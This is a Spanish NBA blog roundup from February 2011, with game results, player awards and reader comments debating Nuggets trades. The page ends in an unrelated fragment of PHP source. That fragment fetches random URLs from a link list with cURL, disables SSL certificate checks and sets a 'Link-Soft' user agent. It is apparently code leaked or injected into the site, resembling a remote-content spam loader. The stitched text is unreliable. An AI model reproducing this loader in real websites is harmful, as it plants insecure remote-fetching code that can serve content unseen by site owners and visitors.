La Crónica (22/02/2011)

23 de February de 2011 por TheDeerHunter

Volvemos a la competición, que es lo que nos interesa.

Pudimos ver qué pinta tienen los nuevos Nuggets sin la carga del culebrón Melo en sus mochilas. Con JR Smith y Ty Lawson de titulares ofrecieron una gran imagen, aprovechando la mala actuación de Zach y Marc para amarrar cómodamente una victoria fundamental para mantener las aspiraciones de postemporada (107-120). A pesar de ello George Karl afirmó que se sentía “más triste que feliz”. Parece que todavía queda algo de humanidad en esta ultraprofesional y competitiva liga.

La jornada no fue demasiado emocionante. En el partido más igualado a priori los Hawks le dieron vidilla a los Lakers estrellándose contra su propia incapacidad anotadora (80-104). Los Celtics tampoco tuvieron problemas en la bahía de Oakland con una gran actuación de su poker de ases más la aportación habitual de Big Baby (115-93). Al final Wade pudo superar el esguince que sufrió en el all-star y se acercó al triple doble. El partidazo de LeBron y el buen hacer de Bosh destrozaron a los Kings (97-117). Se rumorea que Landry podría terminar estos días en los Hornets. “La Bestia” Griffin se quedó solo ante los Thunder en una actuación horripilante de Baron Davis (88-111).

En zona de lucha por plaza de postemporada los Bobcats obtuvieron una victoria pírrica ante Toronto (101-114). Augustin recuperó la chispa que había perdido antes del parón, pero perdieron a Stephen Jackson por lesión. Es la primera vez en la temporada que dos bases de un mismo equipo tienen dobles dígitos en asistencias. Esta vez fueron Calderón y Bayless, la anterior… Calderón y Jack. Los Pacers, sin embargo, mantuvieron la ventaja destrozando a los Wizards al contraataque (113-96). Las 19 pérdidas de los de la capital (un tercio de John Wall) no ayudaron a evitar la sangría. Los Rockets ganaron en Detroit con una sorprendente actuación de Patrick Patterson (108-100) y finalmente pudimos disfrutar de la mejor versión de Brandon Jennings en la victoria de los Bucks frente a los Wolves. Todavía estamos a tiempo de temer al ciervo (88-94).

PREMIOS

MVP: La pareja Kevin Garnett-Rajon Rondo estuvo imparable. El primero cuajó el mejor partido de la temporada con 24 puntos, 12 rebotes, 6 asistencias y 2 tapones y el segundo se fue a los 19 puntos, 15 asistencias y 6 rebotes. Máquinas perfectas ante las que nada pudo hacer Golden State.

Rookie: El partidazo de Blake Griffin se merece el premio al “esfuerzo en vano” así que mejor destacar a Patrick Patterson y sus 20 puntos, 5 rebotes en 22 minutos de juego.

Sorpresa: Samuel Dalembert llegó a Sacramento para, entre otras cosas, tutorizar a Demarcus Cousins pero el partido de ayer debió ser de los pocos en que el profesor lo hizo mejor que el alumno. 18 puntos y 13 rebotes frente el débil juego interior de los Heat.

Decepción: El 0 de 9 de Tayshaun Prince es sin duda el peor partido del día pero, en contra de lo que pueda parecer, no es el peor partido de la carrera del jugador de Detroit. En la temporada 2007/2008 se marcó un 0 de 10…

Esfuerzo en vano: La falta de descanso durante el All-Stars no parece haber afectado lo más mínimo a Blake Griffin. Anoche se quedó cerca del triple doble con 28 puntos, 11 rebotes y 8 asistencias pero su equipo no pudo optar a la victoria en ningún momento. ¿Se dará o no se dará contra el Rookie Wall aunque sea un poquito?

Imágenes | AP Photos / Getty Images

Comenta

7 comentarios a esta entrada

  1. Txusma dice:
    #1

    Lo que tiene más sentido ahora mismo para los Nuggets es intentar vender a Felton y Gallinari/Chandler. Mozgov puede hacer un buen papel como suplente de Nene y Gallinari o Chandler cubrirían el vacio que ha dejado Melo. Un Lawson-Afflalo-Chandler-Martin-Nene no ganará nunca un anillo pero al menos creo que puede luchar por entrar en Playoffs. Y si a esto le sumas lo que pueden conseguir con Felton y Gallinari… Si tienes que vender a tu estrella hazlo como los Nuggets. Como rezaba una pancarta ayer en Denver: “Al menos no somos los Cavs”

      Citar

  2. Carlos dice:
    #2

    ¿Porque la gente está tan segura de que lawson es mejor que felton y chandler mejor que gallinari? Yo no lo tengo tan claro… En cualquier caso, para mí la parte más positiva del traspaso es conservar a fields. Creo que es el complemento ideal para jugar con Stoudemire, Anthony (y… Paul/Williams?). Es relativamente sólido anotando y rebotea muy bien para ser un 2.

      Citar

  3. Txusma dice:
    #3

    Ahora mismo Lawson no es mejor que Felton pero podría llegar a serlo. Lawson es más joven, cobra menos y ha demostrado un potencial interesante. Mejor quedarse con un jugador así si tus planes son más a medio plazo. Lo de Gallinari/Chandler va a gustos. Al italiano le iría genial un equipo con una clara referencia interior y que jugara algo más estático, tipo Magic, por ejemplo o los Clippers que son los que más suenan para quedarse con él.

      Citar

  4. CAMPO2 dice:
    #4

    Como seguidor de los Nets estoy expectante estos dos días que quedan, a mi me guata mas Wilson Chandler que Gallinari, me parece mas completo.

      Citar

  5. Shaker dice:
    #5

    Lo primero, un saludo y mi enhorabuena para quienes os encargueis del blog, la sigo a menudo aunque es mi primer comentario.

    Y este primer comentario va referido a que no debemos olvidar la parte de negocio de la NBA. Así que tenemos a Chandler y Gallinari, dos jugadores de perfil medio (medio-alto si queréis) que deportivamente te van a aportar un rendimiento parecido, aun siendo dos jugadores bastante distintos. La duda, por tanto, radica en quedarse con Chandler, agente libre restringido y que va a pedir un dinerito en verano, o Gallo, al que aun le queda un año del contrato de rookie. No sé vosotros, pero yo traspasaría a Chandler, que además me parece un jugador que está rozando su techo.

      Citar

  6. Denise dice:
    #6

    Por fin vuelve la competición tras el All-Star, de éste, honestamente sólo he visto el mate de Griffin por encima de un coche (nada nuevo) y 20 segundillos del All-Star Game, en los cuales, lo único que me llamó la atención fue el colorido tan bonito que presentaba el suelo de la cancha del Staples, mucho mejor que la horterada de suelo con el que juegan los Lakers.
    A pesar de su buena temporada y marca, los Hawks no dan ningún tipo de miedo para los playoffs. Otro equipo al que le va a caer un buen 4-0, 4-1.

      Citar

  7. Viva_Dirk dice:
    #7

    Odom y Artest por Felton y Wilson Chandler??

    Deberian sacar algun interior bueno, y seguramente buscaran también rondas.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>